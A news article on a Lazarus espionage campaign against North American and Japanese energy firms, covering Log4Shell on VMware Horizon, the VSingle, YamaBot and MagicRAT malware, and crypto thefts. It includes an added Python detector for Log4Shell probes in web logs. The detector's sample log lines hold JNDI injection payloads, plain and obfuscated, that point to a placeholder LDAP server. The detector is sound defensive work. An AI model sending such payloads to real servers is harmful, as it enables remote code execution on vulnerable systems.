A new cyber espionage campaign targeting US, Canadian and Japanese energy providers has been linked to Lazarus, a North Korean state-sponsored hacking group.
Hacking group Lazarus, also known as APT38, has been observed targeting unnamed energy providers in the United States, Canada and Japan between February and July this year, according to Cisco Talos.
According to Cisco's research, the hackers exploited a year-old vulnerability in Log4j, known as Log4Shell, on internet-exposed VMware Horizon servers to gain an initial foothold in a victim's enterprise network, then deployed bespoke malware known as "VSingle" and "YamaBot" to establish long-term persistent access.
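The initial-access step above is the same Log4Shell pattern defenders hunt for in the web logs of Horizon and other Java-fronted services. The following is an added example, not code from Cisco Talos or the article: a small log triage routine that resolves the nested-lookup and URL-encoding tricks used to hide the literal `jndi` token and then flags the lines that carry a JNDI lookup. The log lines, addresses and paths are constructed.

```python
import re
from urllib.parse import unquote

# Nested lookups used to split up the literal "jndi" token so that naive
# substring matching misses it; each resolves to its inner text at log time:
#   ${lower:j} -> j   ${upper:j} -> J   ${::-j} -> j   ${env:NOPE:-j} -> j
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# What survives normalization whenever a JNDI lookup was present.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Constructed access-log lines (Combined Log Format); not from any real incident.
SAMPLE_LOG = [
    '203.0.113.4 - - [01/Mar/2022:10:00:01 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Mar/2022:10:00:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [01/Mar/2022:10:00:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [01/Mar/2022:10:00:12 +0000] "GET /portal/?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fa%7D HTTP/1.1" 400 0 "-" "curl/7.79"',
]


def normalize(text: str) -> str:
    """Undo URL-encoding and resolve nested lookups until a fixpoint is reached."""
    prev, cur = None, text
    while cur != prev:
        prev = cur
        cur = unquote(cur)  # handles single and repeated percent-encoding
        cur = _CASE_LOOKUP.sub(lambda m: m.group(1), cur)
        cur = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), cur)
    return cur.lower()


def is_log4shell_probe(line: str) -> bool:
    """True if the line carries a JNDI lookup once de-obfuscated."""
    return _JNDI.search(normalize(line)) is not None


def flag_lines(lines):
    """Return (1-based line number, normalized line) for every suspicious entry."""
    return [(i, normalize(ln)) for i, ln in enumerate(lines, 1) if is_log4shell_probe(ln)]


if __name__ == "__main__":
    for num, shown in flag_lines(SAMPLE_LOG):
        print(f"line {num}: {shown}")
```

Matching after normalization rather than on the raw line is the point: the second and third malicious entries would pass a plain `"${jndi:"` substring check.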
Japan's national computer emergency response team, known as CERT, recently attributed YamaBot to the Lazarus APT.
Symantec revealed the details of this espionage campaign in April this year. The Symantec team attributed the operation to "Stonefly", another North Korean hacking group that sometimes overlaps with Lazarus.
Cisco Talos also observed a previously unknown remote access Trojan — or RAT — named "MagicRAT", attributed to Lazarus Group, which the hackers use for reconnaissance and stealing credentials.
According to Cisco Talos security researchers Jung soo An, Asheer Malhotra and Vitor Ventura, the main goal of these attacks was likely to establish long-term access into victim networks in order to conduct espionage operations in support of North Korean government objectives.
"This activity aligns with historical Lazarus intrusions targeting critical infrastructure and energy companies to establish long-term access to siphon off proprietary intellectual property," Cisco Talos researchers said.
The Lazarus Group is a financially motivated, North Korean state-backed hacking group whose operations support Pyongyang's state objectives, including military research and development and the evasion of international sanctions.
In recent months, the hacking group turned its attention to blockchain and cryptocurrency organisations.
It has been linked to the recent theft of $100 million in crypto assets from Harmony’s Horizon Bridge, and the theft of $625 million in cryptocurrency from the Ronin Network, an Ethereum-based sidechain made for the popular play-to-earn game Axie Infinity.
The Cisco Talos researchers added that Pyongyang has long used stolen cryptocurrency and the theft of other information to fund its nuclear weapons program.
In July, the US government offered a $10 million reward for information on members of state-sponsored North Korean threat groups, including Lazarus, double the amount the US State Department announced in April.